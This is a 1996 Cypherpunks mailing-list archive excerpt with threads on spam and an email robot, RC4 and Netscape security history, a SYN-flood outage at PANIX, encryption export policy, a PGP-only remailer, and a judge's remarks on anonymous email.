> send to makers of software, and my product applies to their world.
>

Comment is one thing. Mass junk mail is another. I'd view "comment" as expressing an opinion. If I put an "email to:" tag on a web site, I'm inviting "comment" on the information I've placed in public view - there's reasonable expectation that the "comment" will be pertinent, even if it is only "Your automated gif sucks." This isn't quite the same as inviting completely irrelevant junk mail, and I still fail to see how you make this leap of logic.

You are on a public mailing list, aren't you?
You have some degree of expectation as to the pertinence of topics discussed on said list, don't you? Even if it is c'punks? The same holds true for newsgroups. The vast majority of 'net users dislike off-topic discussion; they subscribe to mailing lists and newsgroups to discuss topics of relevance and mutual interest. It is highly self-centered of you to assume the "right" to waste their time with unwanted and completely off-topic communication.

> If you don't want spam in your mail box:
>
> 1. Don't have a website or don't put your e-mail address on your
> website

1a. Set up a robots.txt file. See http://www.info.webcrawler.com. Polite robots will comply, though I doubt spammers building mailing lists will be polite.

> 2. Don't post to newsgroups

2a. Actively exercise YOUR freedom of speech to dissuade spammers. Contact their ISP. Forward a complete copy of the spam; this lets the ISP see what's being sent where, and fills up their mail spool too. Most ISPs will decide that the spammer can take his/her business elsewhere.

> 3. Don't post to mailing lists
> 4. If you post do so anonymously

Oh, so now I MUST remain anonymous, or I invite any and all correspondence regardless of relevance. Seems like your exercising of your rights is compromising mine.

Laws restrict freedom. They determine what we cannot do without fear of penalty. Some individuals exercise their "right" to freedom of action to the extent that they harm others. This causes those "others" to willingly/grudgingly give up some of their own freedom of action in exchange for protection.

When you exercise your "right" to free speech to the extent that you piss off a large segment of society, society will react by reducing its measure of freedom of speech. You have a right to speak your message, but you do not have the right to spray-paint it on the wall of my house. You may broadcast your message on the airwaves, but are subject to some restrictions.
You once enjoyed the "right" to fax anything you wanted to send to my fax machine. Enough junk mail was sent to enough fax machines, and now many jurisdictions have another LAW restricting this behavior.

I don't want to see legislation come to the 'net, but it will, and your attitude hastens it. The long-term result of your abuse of your "right" to free speech is the invitation of government meddling into my right to free speech.

- r.w.

From perry at piermont.com Thu Sep 12 21:05:07 1996
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 13 Sep 1996 12:05:07 +0800
Subject: SPL -- Suspicious Persons List
In-Reply-To: <3238B073.2847@ai.mit.edu>
Message-ID: <199609130114.VAA08507@jekyll.piermont.com>

Hallam-Baker writes:
> Pity you guys missed out on the idea of trades unions and think that
> employment is some kind of serfdom in which you lose all your
> rights the day you sign up. If you hadn't sold your government to
> the corporations a while back you might have got out of the middle
> ages.

Yes, we could be a workers paradise like one of those lovely European countries with double digit unemployment and all. Too bad we didn't go in for democratic socialism while we could have, eh?

Perry

From aba at dcs.ex.ac.uk Thu Sep 12 21:09:32 1996
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Fri, 13 Sep 1996 12:09:32 +0800
Subject: [Long] A history of Netscape/MSIE problems
In-Reply-To: <84245818912499@cs26.cs.auckland.ac.nz>
Message-ID: <199609120716.IAA00231@server.test.net>

Peter Gutmann writes on cpunks:
> [...] The reason for the 40-bit key and (according to RSADSI, the
> company that developed RC4) the reason why details on it were kept
> secret was that these conditions were required under an agreement
> between the Software Publishers Association (SPA) and the US
> government which gave special export status to the RC4 algorithm and
> a companion algorithm called RC2.

Hadn't heard that before, that the trade secret requirement was imposed on RSADSI.
What was your source for that info, it is an interesting assertion on the part of RSADSI, and I am intrigued.

> [reverse engineer of RC4...]
> The results were posted to mailing lists and the Internet [Anon
> 1994a]. Someone with a copy of BSAFE tested it against the real
> thing and verified that the two algorithms produced identical
> results [Rescorla 1994], and someone else checked with people who
> had seen the original RC4 code to make sure that it had been
> (legally) reverse-engineered rather than (illegally) copied [Anon
> 1994b].

Some people held that it had been a licensed holder of RC4 source who had posted it in violation of the license agreement. I think I recall that Tim May, maybe others, argued this nearer the time. That the code looked different isn't of itself proof that it was or wasn't reverse engineered; it is entirely plausible for the anonymous poster (if it was a source license violation) to have gone to some pains to obscure this fact, by changing the appearance and style of the code.

> [RC4 key schedule biases...]

You ought to reference Andrew Roos' paper [posted to the list, and sci.crypt, at least] analysing key schedule biases in RC4. Paul Kocher posted a response (this was in sci.crypt) saying that he had discovered the same biases while working for RSADSI, (at a time before RC4 was revealed, or at least before RSADSI started discussing RC4 publicly, a tacit admission by them that alleged RC4 was RC4).

> Further improvements to the attack were proposed.

Andrew Roos' brutessl code was special case optimised for SSL, he precomputed part of the MD5 digest, and progressed through the key space in an order chosen to maximise the amount of MD5 precomputation that could be done. Something of interest, perhaps.

> The attacks on RC4 are a prime example of a publicity attack.
> They were carried out by volunteers using borrowed machine time, no one (apart from
> Netscape's stock prices) was harmed,

Strangely (I'm not sure if anyone lost money due to this), I think Netscape's prices hardly suffered, perhaps even improved slightly. Could be due to the `any publicity is good publicity' syndrome. There was a *lot* of publicity, and Netscape's response in fixing the problem was good. Several US cypherpunks were tracking the stocks at the time, and could probably verify this.

One omission: you didn't say anything about Paul Kocher's timing attack on RSA, which I think affected Netscape servers, and was fixed after his publicizing the attack. Then you could discuss Ron Rivest's blinding solution, and the time delay solution.

Otherwise, excellent.

Adam
--
#!/bin/perl -sp0777i

At 9:48 PM 9/12/96, Rabid Wombat wrote:
>>
>> These people have invited the email, and the associated expense, by placing
>> a public email-to: button on their public www page.
>
>
>Most people put up an "email to:" button on a public page for
>communications related to what's on the page. It's quite a stretch to
>assume that this invites any and all email from anyone who cares to send
>whatever they want. I can't say I've ever seen one that said "Please send
>SPAM(tm) to:" ...

But to attempt to define "SPAM" (unless you're Armour) is dangerous. This whole notion of "unwanted mail" is ill-defined and not something "the law" should get involved in, in my view. (And CP technologies certainly are consistent with this, e.g., placing the role of screening on those who set up gates, not on tracking down True Names for prosecution.)

>However, since others may think like you, I guess I'll have to add a line
>above my link stating that email not related to the purpose of my site
>will be happily proof-read at the rate of $200 per hour, 1 hour per 60
>lines, minimum. Perhaps I'll get lucky.
>If I get a big enough chunk of
>SPAM(tm), it might be worth the costs of breaking down the anonymity.

As the legal eagles will tell you, the essence of a contract is a two-way agreed upon set of terms, not a one-way "if you send me mail I decide I don't want, you will have incurred a charge of $1000."

Try enforcing your $200 an hour "proofreading charge" in any court in the land.

(I've been saying this thing for several years. Who knows, maybe Rabid Wombat was the first to use it. Whatever, it's as unenforceable and meaningless now as it was several years ago.)

>No, this b.s. is more like having someone put a dead skunk in my mailbox,
>with no return address, trying to prevent me from sending them 100 dead
>skunks as a return favor. And about as welcome.

In the case of actual USPS mailboxes, there are laws which prevent others from using them (e.g., no UPS or FedEx deliveries). For sure, dead skunks can be placed in mailboxes, or under porches, or whatever. The law can't fix everything.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From robert at precipice.v-site.net Thu Sep 12 21:16:56 1996
From: robert at precipice.v-site.net (HipCrime)
Date: Fri, 13 Sep 1996 12:16:56 +0800
Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam]
In-Reply-To:
Message-ID: <3238BD18.64F8@precipice.v-site.net>

> I'd view "comment" as expressing an opinion.
> If I put an "email to:" tag on a web site, I'm inviting "comment" on the information I've
> placed in public view

A message sent to a MAILTO button on a WebPage, which contains the URL of another WebPage is EXACTLY on-topic. It's my belief that any active "webmistress" would be interested in what other sites have to offer.

-- HTTP://www.HIPCRIME.com

From macgyver at colphi.edu.ar Thu Sep 12 21:17:17 1996
From: macgyver at colphi.edu.ar (MacGyver)
Date: Fri, 13 Sep 1996 12:17:17 +0800
Subject: Security technical list
Message-ID: <409if995@colphi.edu.ar>

[pgp sign clear]

Anybody could help me to find a mail list of security,crypto,etc??

Regards

From tcmay at got.net Thu Sep 12 21:18:02 1996
From: tcmay at got.net (Timothy C. May)
Date: Fri, 13 Sep 1996 12:18:02 +0800
Subject: Morph Escrow
Message-ID:

At 12:40 AM 9/13/96, Greg Broiles wrote:

>Kozinski also suggested that computer-generated or morphed images of
>children involved in sexual acts may not be protected under the Constitution
>because of ongoing trauma to the child, while computer-generated or morphed
>images of adults would be protected.

Hence the proposal for "morph escrow":

"Upon presentation of a valid court order or Presidential Decision Directive, a complete morph history of any image deemed possibly of prurient interest must be presented to law enforcement."

As the law cannot tell if an image of prurient interest started out as a legal image of Raquel Welch or Jennifer Aniston, or started out as an illegal image of a minor child, morph escrow will force all image possessors and distributors to produce proof that the image started out legal.

Failure to escrow morph histories, or possession of an image with an authorized morph history escrow certificate, is punishable by not less than six months in jail.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C.
May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From sameer at c2.net Thu Sep 12 21:19:13 1996
From: sameer at c2.net (sameer)
Date: Fri, 13 Sep 1996 12:19:13 +0800
Subject: [Long] A history of Netscape/MSIE problems
In-Reply-To: <199609120716.IAA00231@server.test.net>
Message-ID: <199609130137.SAA27304@lachesis.c2.net>

>
> Hadn't heard that before, that the trade secret requirement was
> imposed on RSADSI. What was your source for that info, it is an
> interesting assertion on the part of RSADSI, and I am intrigued.

An RSA employee told me this once, unofficially. (Not that this makes it true, mind you)

--
Sameer Parekh                   Voice: 510-986-8770
C2Net                           FAX:   510-986-8777
The Internet Privacy Provider
http://www.c2.net/              sameer at c2.net

From ravage at einstein.ssz.com Thu Sep 12 21:20:40 1996
From: ravage at einstein.ssz.com (Jim Choate)
Date: Fri, 13 Sep 1996 12:20:40 +0800
Subject: Fed appellate judge remarks re anonymity, free speech on the (fwd)
Message-ID: <199609130147.UAA01876@einstein>

Forwarded message:

> Date: Thu, 12 Sep 1996 17:40:19 -0700
> From: Greg Broiles
> Subject: Fed appellate judge remarks re anonymity, free speech on the
> net
>
> The article quotes Kozinski as saying "I have a severe problem with
> anonymous E-mailers . . . You don't have a right to walk up to somebody's
> door and knock with a bag over your head." The article says Kozinski likened
> anonymous E-mail to menacing someone.

I guess the esteemed judge doesn't believe in Halloween....

Does this also mean that he supports the complete elimination of junk mail that has no return address on it?

> Kozinski is considered relatively conservative and relatively libertarian,
> as 9th Circuit judges go.
Conservative AND Libertarian? Talk about a non sequitur.

Jim Choate
ravage at ssz.com

From tcmay at got.net Thu Sep 12 21:21:38 1996
From: tcmay at got.net (Timothy C. May)
Date: Fri, 13 Sep 1996 12:21:38 +0800
Subject: Reputation Systems in Action
Message-ID:

At 6:41 PM 9/11/96, paul at fatmans.demon.co.uk wrote:
>> tcmay at got.net (Timothy C. May) writes:
>> > As to "tasteless and insulting," a matter of personal perspective. I find
>> > it helpful to call a spade a spade, and others apparently do as well.
>> >
>>
>> Of course, Tim gets very uncomfortable when others call a spade a spade.
>
>
>This constant character assassination of Tim is getting rather boring,
>as far as I can see, and I read all of the posts on the list, he has
>done nothing more than ignore posts from these idiots, that is his
>choice and nothing to do with anyone else.

But this latest episode illustrates the role of reputations. Namely, my own reputation is not being harmed by bizarre commentaries from the Vulis-bot. As its reputation is (apparently) pretty low, and associated with Serdar Argic-style rants about "sovoks," "the cabal," and "spit," such an entity can hardly "assassinate" my character.

A few years ago Larry Detweiler, aka "vznuri" ("visionary"), aka "S.Boxx," aka "Pablo Escobar," aka several other alternate personalities, wrote dozens of screeds denouncing me, Eric Hughes, Nick Szabo, Hal Finney, etc. Did this have an effect on our reputations? Not to people I respected, of course. And if Detweiler's rants affected my reputation with his peers, including Dimitri Vulis, Ludwig Plutonium, Doctress Neutopia, Serdar Argic, well, this is to the good.

In the mathematics of reputations, a negative reputation held by one whose own reputation is negative is a positive.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C.
May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From gcooke at Rt66.com Thu Sep 12 21:46:35 1996
From: gcooke at Rt66.com (Gregg Cooke)
Date: Fri, 13 Sep 1996 12:46:35 +0800
Subject: What is best policy paper on crypto?
Message-ID:

At 6:07 PM 9/12/96, Hallam-Baker wrote:
>Adam Shostack wrote:
>>
>> Declan McCullagh wrote:
>> | I happen to know that an influential Congresspern will be meeting with
>> | some Cato folks tomorrow morning, so I'm assuming this isn't an idle
>> | request.
[ . . . ]
>
>> The NAS report, despite a few silly points, does push for
>> liberalization of the export regime, standardization, a switch to
[ . . . ]
>
>I agree that the NAS report is the one to use. It's from an authoritative
>source and the conclusions are pretty reasonable. It's perhaps not as far
[ . . . ]

I'm gonna stick my neck out here and ask a naive question: where can I find "the NAS report" mentioned in this thread? Note that I'm new to this list (2 days) so please be kind if this paper is extremely well known (it's not known to me but it sounds like something I need to read).

-Gregg

From wb8foz at nrk.com Thu Sep 12 22:19:38 1996
From: wb8foz at nrk.com (David Lesher)
Date: Fri, 13 Sep 1996 13:19:38 +0800
Subject: Sen. Burns' statement on postponement of Crypto vote today.
In-Reply-To:
Message-ID: <199609122356.TAA01893@nrk.com>

Robert Hettinga sez:
> From: somebody
> Administration in next two
> weeks will unveil its "new and improved" encryption policy, which will likely
> offer a shift in licensing to Commerce Dept., and gradual easing of
> exportable strength, in exchange for industry-funded key escrow management
> demo projects.
I hear that the Feebs and DOJ are upset that they do not have enough pull in NSA/Commerce decisions; and want to get in the middle of the process. Industry is screaming over that.

Of course, Feebs et al. have no legal standing in ITAR decisions, but that's not stopped 'em before....

--
A host is a host from coast to coast.................wb8foz at nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433

From WlkngOwl at unix.asb.com Thu Sep 12 23:03:49 1996
From: WlkngOwl at unix.asb.com (Deranged Mutant)
Date: Fri, 13 Sep 1996 14:03:49 +0800
Subject: Bubba Bottoming out on Cocaine Paranoia?
Message-ID: <199609130148.VAA15888@unix.asb.com>

No comments about Bubba, Joe Sixpack, the NWO, Greys, Reds, Greens, those on the dole or those high on Dole....

Just notice the strange contradiction below:

=WIRED WORLD WILL "DIMINISH NATIONAL SOVEREIGNTY"
[..]
=when the whole world is "wired" and e-cash is the norm. The result
=will be less powerful governments in relation to criminal
=organizations such as the Mafia and international drug cartels, says
=Michael Nelson, who adds that organized crime members are already
=some of the most sophisticated users of computer systems and strong
=encryption technology. ...

Ok, the "bad guys" will use sophisticated security devices... but below, apparently the "good guys" don't use the same sophisticated tech, and therefore are at an even greater risk from another set of "bad guys"...

= ... In addition, computer crackers will pose a
=more significant threat. In response, Nelson advocates resolving the
=issue of whether unauthorized access of a computer is an "act of
=trespass" or an "act of war," and prosecuting the intrusions
=accordingly. (BNA Daily Report for Executives 6 Sep 96 A14)
= (Courtesy of Edupage)

---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl at unix.asb.com (root at magneto)
Send a message with the subject "send pgp-key" for a copy of my key.

From tcmay at got.net Thu Sep 12 23:21:45 1996
From: tcmay at got.net (Timothy C. May)
Date: Fri, 13 Sep 1996 14:21:45 +0800
Subject: Fed appellate judge remarks re anonymity
Message-ID:

At 1:47 AM 9/13/96, Jim Choate wrote:
>Forwarded message:
>
>> Date: Thu, 12 Sep 1996 17:40:19 -0700
>> From: Greg Broiles
>> Subject: Fed appellate judge remarks re anonymity, free speech on the
>> net
>>
>> The article quotes Kozinski as saying "I have a severe problem with
>> anonymous E-mailers . . . You don't have a right to walk up to somebody's
>> door and knock with a bag over your head." The article says Kozinski likened
>> anonymous E-mail to menacing someone.
>
>I guess the esteemed judge doesn't believe in Halloween....

Actually, seven of the children who came before his court on this charge are still in prison. He sentenced them to between 4 and 7 years.

(By the way, some communities have made it illegal for adults to be out by themselves when children are "trick-or-treating." Typically, the laws are vague and are used for harassment, not actual prosecution. And I rather doubt that the costume I plan to wear to Sandy Sandfort's party--"Jeffrey Dahmer," with a bag over my shoulder and what appear to be severed limbs sticking out of the bag--would be "acceptable" to local cops.)

--Tim "The Unadahmer" May (I blow up my victims and then cook the pieces)

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C.
May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From jgrasty at gate.net Thu Sep 12 23:23:24 1996
From: jgrasty at gate.net (Joey Grasty)
Date: Fri, 13 Sep 1996 14:23:24 +0800
Subject: WinSock Remailer Accepting Only PGP Messages Starting September
Message-ID: <199609130213.WAA113878@osceola.gate.net>

Y'all:

Due to the large number of inconsiderate users and spammers, the vast majority of whom do not use PGP, we are changing the operation of the WinSock Remailer at winsock at c2.org to accept only incoming messages that are encrypted with PGP. This change will become effective September 16, 1996 at 9:00 PM EDT.

On a brighter note, a new release of the WinSock Remailer will be available on September 17. In addition to bug fixes, a number of new features have been added including:

- support for shared or exclusive POP account (the operator will be able to operate the remailer from his personal account; messages without proper remail headers will be left in the mail spool for retrieval with any other POP mail client).
- support for changing the outgoing message pool size on the Outgoing Mail dialog box.
- remailer now accepts "help" in addition to "remailer-help" to retrieve the help file for the remailer. A large number of help requests were piling up in the reject directory, so this should cure that problem.

And yes, the bug that prevented the remailer from operating in PGP Only mode has been fixed. :-)

Regards,

Joey Grasty (jgrasty at gate.net)
Jim Ray (liberty at gate.net)
WinSock Remailer Operators

From zachb at netcom.com Thu Sep 12 23:55:28 1996
From: zachb at netcom.com (Z.B.)
Date: Fri, 13 Sep 1996 14:55:28 +0800
Subject: who can count?
In-Reply-To: <3238B18E.7211@precipice.v-site.net>
Message-ID:

On Thu, 12 Sep 1996, HipCrime wrote:

> > No, this b.s. is more like having someone put a dead skunk in my
> > mailbox, with no return address, trying to prevent me from sending
> > them 100 dead skunks as a return favor. And about as welcome.
>
> 100 dead skunks in exchange for ONE is exactly what this discussion
> is all about. You CypherWIMPS just love over-kill. EmailRobot sent
> ONE message to EACH address. Are you guys so unskilled in arithmetic
> to understand the difference between 1 and 100?
>

It doesn't matter if you get one or one hundred messages - both are still annoying as hell. If I wanted whatever you're advertising or selling, I'd come look for it. I'd prefer that you not mail me.

---
Zach Babayco
zachb at netcom.com <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127

From perry at piermont.com Thu Sep 12 23:57:55 1996
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 13 Sep 1996 14:57:55 +0800
Subject: PANIX.COM down: denial of service attack
In-Reply-To: <199609130334.AA161125684@relay.hp.com>
Message-ID: <199609130408.AAA09629@jekyll.piermont.com>

M C Wong writes:
> > For those who are IP hackers, the problem is that we're
> > being flooded with SYNs from random IP addresses on
> > our smtp ports. We are getting on average 150 packets
>       ^^^^
>
> Can't access to this port be guarded against by a filtering
> router which is configured to accept *only* a number of
> trusted MX hosts ?

Sure -- if you only want to accept mail from fifteen machines on earth. If on the other hand your users might get mail from anywhere on earth, your mail ports have to be open to connections from anywhere.
.pm

From rittle at comm.mot.com Thu Sep 12 23:58:15 1996
From: rittle at comm.mot.com (Loren James Rittle)
Date: Fri, 13 Sep 1996 14:58:15 +0800
Subject: [Long] A history of Netscape/MSIE problems
In-Reply-To: <199609120716.IAA00231@server.test.net>
Message-ID: <9609130448.AA21647@supra.comm.mot.com>

>Date: Thu, 12 Sep 1996 08:16:47 +0100
>From: Adam Back

>> The attacks on RC4 are a prime example of a publicity attack. They were
>> carried out by volunteers using borrowed machine time, no one (apart from
>> Netscape's stock prices) was harmed,

>Strangely (I'm not sure if anyone lost money due to this), I think
>Netscape's prices hardly suffered, perhaps even improved slightly.
>Could be due to the `any publicity is good publicity' syndrome. There
>was a *lot* of publicity, and Netscape's response in fixing the problem
>was good. Several US cypherpunks were tracking the stocks at the
>time, and could probably verify this.

I have been tracking Netscape stock closely since the IPO.

I can safely say that Netscape stock didn't suffer one iota when the news reports of the cypherpunks' attacks hit the papers. I agree with Adam, Netscape stock generally rose (err, skyrocketed would be a better word) the entire time of the cypherpunks incidents. [Anyone can verify this analysis by comparing the chart at http://www.stockmaster.com/sm/g/N/NSCP.html with the dates of the cypherpunks incidents (all important dates in 1995 by my records).]

Netscape's stock price has generally fallen since these incidents, but this was obviously (if anything is obvious when it comes to matching stock price swings to real events :-) caused by increased general market pressure and, quite importantly, the fact that Microsoft was able to deliver a reasonable product with which to compete with Netscape in such a timely fashion. I think even close Microsoft watchers were surprised by Microsoft's speed to market with something quite decent.

In retrospect, none of this surprises me.
The stock's fall from grace was predicted (at least by myself), just the exact timing for the fall was far different than I expected.

None of this is to say anything about a Netscape fall from grace, as a company. They make great product, but the skyrocketing stock price after the IPO made no sense to me. Anyone that looked closely at the IPO model (early investors got *huge* chunks of shares at mere pennies/share) and the evolution of the software market should have been able to plainly see that $170/share for Netscape (pre-split price hit early Dec 1995 and late Jan 1996) is insane. I wonder who bought at $170?

Regards,
Loren
--
Loren J. Rittle (rittle at comm.mot.com)  PGP KeyIDs: 1024/B98B3249 2048/ADCE34A5
Systems Technology Research (IL02/2240)  FP1024:6810D8AB3029874DD7065BC52067EAFD
Motorola, Inc.                           FP2048:FDC0292446937F2A240BC07D42763672
(847) 576-7794                           Call for verification of fingerprints.
Of course, these are my opinions, not Motorola's.

From wombat at mcfeely.bsfs.org Fri Sep 13 00:04:29 1996
From: wombat at mcfeely.bsfs.org (Rabid Wombat)
Date: Fri, 13 Sep 1996 15:04:29 +0800
Subject: who can count?
In-Reply-To: <3238B18E.7211@precipice.v-site.net>
Message-ID:

On Thu, 12 Sep 1996, HipCrime wrote:

> > No, this b.s. is more like having someone put a dead skunk in my
> > mailbox, with no return address, trying to prevent me from sending
> > them 100 dead skunks as a return favor. And about as welcome.
>
> 100 dead skunks in exchange for ONE is exactly what this discussion
> is all about. You CypherWIMPS just love over-kill.
                    ^^^^^^^^^^^
I suspect you may soon be hearing from far worse than I ... Some punks take their colors seriously.

EmailRobot sent
> ONE message to EACH address. Are you guys so unskilled in arithmetic
> to understand the difference between 1 and 100?
>
> One message is NOT spam, 100 messages to a single box IS spamming.
>
>
>
> -- HTTP://www.HIPCRIME.com
>

The same useless and boring message posted by rote to a huge collection of addresses is spam, unless participation is voluntary and consensual, in which case it is a mailing list. :)

Given that less than 1% of those spammed are likely to reply, and merely hit the delete key and curse a bit, you are hereby awarded approximately 100 dead skunks.

- r.w.

From rwright at adnetsol.com Fri Sep 13 00:08:25 1996
From: rwright at adnetsol.com (Ross Wright)
Date: Fri, 13 Sep 1996 15:08:25 +0800
Subject: "Unwanted Mail"
Message-ID: <199609130451.VAA01566@adnetsol.adnetsol.com>

On Or About: 12 Sep 96 at 22:49, Rabid Wombat wrote:

>
> The same useless and boring message posted by rote to a huge collection of
> addresses is spam, unless participation is voluntary and consensual, in
> which case it is a mailing list. :)
>

Spam, like the definition of useless and boring, is very subjective. So, I feel that what I am doing is useful and interesting. I am sure that HipCrime feels the same. Just keep on bitching to the list and don't call your congressman about a few unwanted e-mails.

Tim May writes:

>But to attempt to define "SPAM" (unless you're Armour) is dangerous.
>This whole notion of "unwanted mail" is ill-defined and not something
>"the law" should get involved in, in my view. (And CP technologies
>certainly are consistent with this, e.g., placing the role of
>screening on those who set up gates, not on tracking down True Names
>for prosecution.)

>In the case of actual USPS mailboxes, there are laws which prevent
>others from using them (e.g., no UPS or FedEx deliveries). For sure,
>dead skunks can be placed in mailboxes, or under porches, or whatever.
>The law can't fix everything.

Thanks, Tim. My point exactly!
Ross
===========
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906

From jf_avon at citenet.net Fri Sep 13 00:08:57 1996
From: jf_avon at citenet.net (Jean-Francois Avon)
Date: Fri, 13 Sep 1996 15:08:57 +0800
Subject: who can count?
Message-ID: <9609130433.AB09422@cti02.citenet.net>

-----BEGIN PGP SIGNED MESSAGE-----

On 12 Sep 96 at 17:57, HipCrime wrote:

> > No, this b.s. is more like having someone put a dead skunk in my
> > mailbox, with no return address, trying to prevent me from sending
> > them 100 dead skunks as a return favor. And about as welcome.
>
> 100 dead skunks in exchange for ONE is exactly what this discussion
> is all about. You CypherWIMPS just love over-kill. EmailRobot sent
> ONE message to EACH address. Are you guys so unskilled in
> arithmetic to understand the difference between 1 and 100?
>
> One message is NOT spam, 100 messages to a single box IS spamming.

Dear HipCrime,

My e-mail address is *paid for*, I subscribe to it for my own self-interest *only*.

I do send requests for junk mail from various companies that falls into my fields of interest. But take note that since *I* pay for it, I consider it as my private territory. If you want to trespass, it is up to you and for the moment, there is nothing much I can do, unfortunately.

I invite you to send me as much spam as you want, as long as you send me 0.1 gram of pure, 24k gold per kilobyte of spam (rounded to the superior Kb, i.e. 1.1Kb=.2g Au) you send me, payable in gold at the rate of the next day the spam was received by me, delivered at my local mailbox within 30 days (2% monthly fees applies).

As long as you send payment, your spam will be welcome. (And don't send "spoofed-gold" I've got an eye for the genuine stuff :)

Of course my rates are steep and non-negotiable, but there hey, what is morally objectionable in making profit when I don't *force* anybody to accept?

Regards

jfa

p.s.
e-mail me privately for my postbox address.

- --
Jean-Francois Avon, Montreal QC Canada
DePompadour, Societe d'Importation Ltee
Finest of Limoges porcelain and crystal
JFA Technologies, R&D consultant
physicists and engineers, LabView programing
PGP keys at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891

From mcw at hpato.aus.hp.com Fri Sep 13 00:21:59 1996
From: mcw at hpato.aus.hp.com (M C Wong)
Date: Fri, 13 Sep 1996 15:21:59 +0800
Subject: PANIX.COM down: denial of service attack
In-Reply-To: <199609130408.AAA09629@jekyll.piermont.com>
Message-ID: <199609130416.AA198858212@relay.hp.com>

> M C Wong writes:
> > > For those who are IP hackers, the problem is that we're
> > > being flooded with SYNs from random IP addresses on
> > > our smtp ports. We are getting on average 150 packets
> >                 ^^^^
> >
> > Can't access to this port be guarded against by a filtering
> > router which is configured to accept *only* a number of
> > trusted MX hosts ?
> Sure -- if you only want to accept mail from fifteen machines on
> earth. If on the other hand your users might get mail from anywhere on
> earth, your mail ports have to be open to connections from anywhere.

No, I am saying that we use MX field in DNS to specify our MX hosts, so other hosts from anywhere else will timeout connecting to the target smtp while trying to deliver mails directly to it, and hence will have to send the message to next best MX host instead, and the firewall is configured to permit access *only* from those MX hosts.

The problem here becomes how one can protect all those MX hosts instead. DNS cannot hide those info properly I believe since it will mean it also hides info of mail delivery to the host, a D.O.S in itself. 8-((

> .pm

From zachb at netcom.com Fri Sep 13 00:24:49 1996
From: zachb at netcom.com (Z.B.)
Date: Fri, 13 Sep 1996 15:24:49 +0800
Subject: Fed appellate judge remarks re anonymity, free speech on the net
In-Reply-To: <2.2.32.19960913004019.006df548@pop.ricochet.net>
Message-ID:

On Thu, 12 Sep 1996, Greg Broiles wrote:

>
> (Also in today's news, the 9th Circuit upheld a CA statute forbidding sales
> of material considered "harmful to minors" from vending machines.)
>

Oh, well, that just narrows it down really well. Might as well just take out all of the machines now, because you could make a case that just about ANYTHING out of a vending machine is "harmful to minors". Soda machines? Caffeine and sugar. Snack machines? Sugar again. Those machines in supermarkets that give little toys? A child *could* swallow one and choke. And on and on and on.

Even if this statute is meant only to apply to cigarette machines, which would seem to be the case given all of the anti-cig stuff going on now, what good will it do? I have never (in 20 years living in CA) seen a cigarette machine out where a child could get something from it, only inside a pool hall or another adult-only establishment. Another one of those bills to "selectively enforce" things, perhaps?

Sheesh.

---
Zach Babayco
zachb at netcom.com <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127

From perry at piermont.com Fri Sep 13 00:36:10 1996
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 13 Sep 1996 15:36:10 +0800
Subject: PANIX.COM down: denial of service attack
In-Reply-To: <199609130416.AA198858212@relay.hp.com>
Message-ID: <199609130421.AAA09822@jekyll.piermont.com>

M C Wong writes:
> > > Can't access to this port be guarded against by a filtering
> > > router which is configured to accept *only* a number of
> > > trusted MX hosts ?
>
> > Sure -- if you only want to accept mail from fifteen machines on
> > earth. If on the other hand your users might get mail from anywhere on
> > earth, your mail ports have to be open to connections from anywhere.
>
> No, I am saying that we use MX field in DNS to specify our MX hosts, so
> other hosts from anywhere else will timeout connecting to the target smtp
> while trying to deliver mails directly to it, and hence will have to send
> the message to next best MX host instead, and the firewall is configured
> to permit access *only* from those MX hosts.
>
> The problem here becomes how one can protect all those MX hosts instead.

You can't. All you are doing is moving the problem. I don't see how that could be of any possible interest. The machines in question are already the MX hosts for the zone.

Perry

From wombat at mcfeely.bsfs.org Fri Sep 13 00:36:27 1996
From: wombat at mcfeely.bsfs.org (Rabid Wombat)
Date: Fri, 13 Sep 1996 15:36:27 +0800
Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam]
In-Reply-To: <3238BD18.64F8@precipice.v-site.net>
Message-ID:

OTOH, there's always altavista.

- r.w.

On Thu, 12 Sep 1996, HipCrime wrote:

> > I'd view "comment" as expressing an opinion.
